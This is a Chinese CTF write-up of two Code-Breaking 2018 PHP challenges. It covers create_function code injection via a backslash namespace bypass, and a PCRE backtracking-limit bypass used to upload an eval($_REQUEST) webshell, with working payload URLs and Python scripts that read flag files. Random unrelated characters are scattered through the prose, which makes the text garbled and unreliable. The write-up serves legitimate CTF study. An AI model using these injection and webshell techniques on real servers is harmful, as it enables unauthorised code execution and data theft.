原本看到代碼審計(jì)知識星球的內(nèi)容時(shí)就很感興趣怎炊,準(zhǔn)備自己本地復(fù)現(xiàn)的谭企。結(jié)果docker跟docker-compose下好了后郁師傅直接公網(wǎng)上搭好了四道easy難度的審計(jì)題目叫我們做hhh。
codebreaking的網(wǎng)站
https://code-breaking.com/
參考閱讀了sky一葉飄零師傅的幾篇博文:
https://skysec.top/2019/03/10/2018-Code-Breaking-1-function/
源碼跟dockerfile可以在github上下评肆,我自己沒有docker知識儲備的情況下也能依葫蘆畫瓢在本地搭好债查,大家也都可以試試自己做做呀。
function
第一道題目瓜挽,php代碼審計(jì)之function盹廷。
先放源碼:
<?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';
if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
show_source(__FILE__);
} else {
$action('', $arg);
}
?>
老實(shí)說第一題確實(shí)難到我了,開始前兩行差點(diǎn)以為是代碼出錯(cuò)了......后來了解到??三元運(yùn)算符的存在,也就是說:
$action = $_GET['action'] ?? '';
等價(jià)于
$action = $_GET['action'] ? $_GET['action'] :'';
改成雙目運(yùn)算符就好看多了秸抚,作用也就和我們原來的isset()差不多速和,有輸入取輸入,否則為空剥汤。
然后就是正則部分了
preg_match('/^[a-z0-9_]*$/isD
其中修飾符
/i不區(qū)分大小寫
/s匹配任何不可見字符颠放,包括空格、制表符吭敢、換頁符等等碰凶,等價(jià)于[ \f\n\r\t\v]
/D 如果使用$限制結(jié)尾字符,則不允許結(jié)尾有換行;
不得不說實(shí)在是完備。數(shù)字鹿驼,字母欲低,下劃線都過濾了,空格換行也沒了畜晰,根本不知道有什么能夠匹配的砾莱。如果從preg_match()的角度來講,我們熟悉的是%0a開頭凄鼻,這樣可以使preg_match()得結(jié)果判斷為真腊瑟。但此處為了達(dá)成命令執(zhí)行的目的聚假,必須使preg_match()判斷為假才能到下面的else語句里面。所以闰非,應(yīng)該想著怎么順應(yīng)這個(gè)思路走下去膘格。
這時(shí)候就得靠想的了〔扑桑可以選擇用burpsuite去爆破瘪贱,但是我好像沒有這樣的字典......所以參考sky師傅改的腳本:
import requests
#url='http://139.199.203.253:8087/?action=&arg='
for i in range(1,256):
tmp = hex(i)[2:]
if len(tmp) < 2:
tmp = '0' + hex(i)[2:]
tmp = '%' + tmp
url='http://139.199.203.253:8087/?action='+tmp+'var_dump&arg=123'
r=requests.get(url=url)
if '123' in r.text:
print(r.text)
print(tmp)
break
FUZZ出來發(fā)現(xiàn)%5c可以直接繞過,而%5c就是\,為什么%5c可以繞過呢辆毡?p牛解釋如下:
php里默認(rèn)命名空間是\菜秦,所有原生函數(shù)和類都在這個(gè)命名空間中。
普通調(diào)用一個(gè)函數(shù)胚迫,如果直接寫函數(shù)名function_name()調(diào)用喷户,調(diào)用的時(shí)候其實(shí)相當(dāng)于寫了一個(gè)相對路徑;
而如果寫\function_name() 這樣調(diào)用函數(shù)访锻,則其實(shí)是寫了一個(gè)絕對路徑褪尝。
如果你在其他namespace里調(diào)用系統(tǒng)類,就必須寫絕對路徑這種寫法
看了后感覺一知半解期犬,于是又看看其他的解釋河哑,大概明白了:
那我們就相當(dāng)于解決了第一個(gè)問題,下面來想想如何解決命令執(zhí)行第二步:$action()應(yīng)當(dāng)是兩個(gè)參數(shù)的函數(shù)龟虎。
發(fā)現(xiàn)sky師傅寫的php代碼注入相當(dāng)全面啊
https://skysec.top/2018/03/09/php-command%20or%20code-injection-summary/
于是知道了create_function這一函數(shù)璃谨,稍微了解了其原理:
<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
?>
相當(dāng)于
function test($a,$b)
{
return "ln($a) + ln($b) = " . log($a * $b);
}
那對本題的$action('', $arg),假如令arg=echo ('Hello');}phpinfo();/*相當(dāng)于
function test($a,$b){
echo('Hello');
}phpinfo();/*
即可執(zhí)行phpinfo()命令。
同樣的還有exec()等等,實(shí)際上后來看源碼里的disablefunction有:
system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,dl,set_time_limit,ignore_user_abort,symlink,link,error_log
基本全過濾了嘛......好在通常print_r()與scandir()不會(huì)被過濾,昨天剛用過棉安,于是試一下底扳。在本目錄看到index.php,在上級目錄看到flag。
payload:
/?action=%5ccreate_function&arg=return%20%222333%22;}print_r(scandir(%27..%27));/*
/?action=%5ccreate_function&arg=return%20"2333";}print_r(file_get_contents(%27../flag_h0w2execute_arb1trary_c0de%27));/*
pcrewaf
第二道題則是正則回溯攻擊贡耽,實(shí)際上之前也了接過這種方式衷模,但是一直沒有遇到相關(guān)題目......先看源碼
<?php
function is_php($data){
return preg_match('/<\?.*[(`;?>].*/is', $data);
}
if(empty($_FILES)) {
die(show_source(__FILE__));
}
$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
echo "bad request";
} else {
@mkdir($user_dir, 0755);
$path = $user_dir . '/' . random_int(0, 10) . '.php';
move_uploaded_file($_FILES['file']['tmp_name'], $path);
header("Location: $path", true, 303);
} 1
題目的pcre已經(jīng)告訴我們了重點(diǎn)在于正則上。實(shí)際上從源碼可以看出蒲赂,有一個(gè)用于判斷是否是php代碼的函數(shù)阱冶。而整體流程允許用戶上傳文件,之后被file_get_contents()讀取,如果文件內(nèi)容有php代碼就失敗滥嘴。否則創(chuàng)建目錄木蹬,并生成保存我們的文件。
既然如此若皱,我們的最終目的當(dāng)然是通過上傳文件getshell了届囚。而想要getshell,過正則是必須的有梆。因此重心還是放在繞過正則上。
那么這個(gè)正則如何通過呢
preg_match('/<\?.*[(`;?>].*/is', $data)
首先就看到它匹配了<,? 這樣的常規(guī)php開頭意系,那么我們能否使用<%=或者<script language="php">繞過呢?貌似因?yàn)閜hp版本號所以不行饺汹。那要如何繞過這一正則吃成為了難題蛔添。
于是找到p牛本人的文章:
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
其中提到NFA(非確定性有限狀態(tài)自動(dòng)機(jī))的部分就不表了,了解到的正則匹配原來存在回溯問題。對題目已有正則兜辞,和測試語句迎瞧,以及sublime的正則匹配模式(ctrl+h開啟)
<?php phpinfo(); ?>;//aaaaaaaaaa
正則匹配到<?時(shí)只需要
而之后
也就是說 .*就已經(jīng)把后面的輸入語句全部匹配完了,但是正則還沒有結(jié)束逸吵,這時(shí)繼續(xù)匹配[(`;?>]時(shí)凶硅,它就會(huì)開始回溯,顯然//aaaaaaaaaa是匹配不上這一表達(dá)式中的符號的扫皱,那么正則就會(huì)一直回溯足绅,直到匹配到;分號才能繼續(xù)下去韩脑。
而這居然也可以當(dāng)做漏洞利用氢妈!因?yàn)檫@一回溯的次數(shù)是有限的,所以如果回溯超過上限......preg_match()就會(huì)返回false,也就繞過了正則段多。
(奇淫技巧大概如此吧首量,真的太神奇了。)
那么利用就很清晰了进苍,我們把//aaa多整點(diǎn)就可以打破回溯上限攻擊加缘。腳本如下(sky師傅的只適用python2吧,我小改了一下):
import requests
from io import BytesIO
url='http://139.199.203.253:8088/'
payload='<?php eval($_REQUEST[byc]);//'+'a' * 1000000
files = {
'file':BytesIO(payload.encode('utf-8'))
}
r=requests.post(url=url,files=files,allow_redirects=False)
path=r.headers['Location']
url+=path
data = {
#'byc':"print_r(scandir('../../../'));"
'byc':"var_dump(file_get_contents('../../../flag_php7_2_1s_c0rrect'));"
}
r=requests.post(url,data)
print(r.text)
掃到上上上級拿到目錄觉啊,之后直接讀取即可
不得不說這些題目技巧性非常強(qiáng)拣宏,也很長見識”樱看似可能的waf存在無限的可能蚀浆。這就是安全人的思考角度吧。
還有兩道明天寫吧,明天就回武漢了hhh
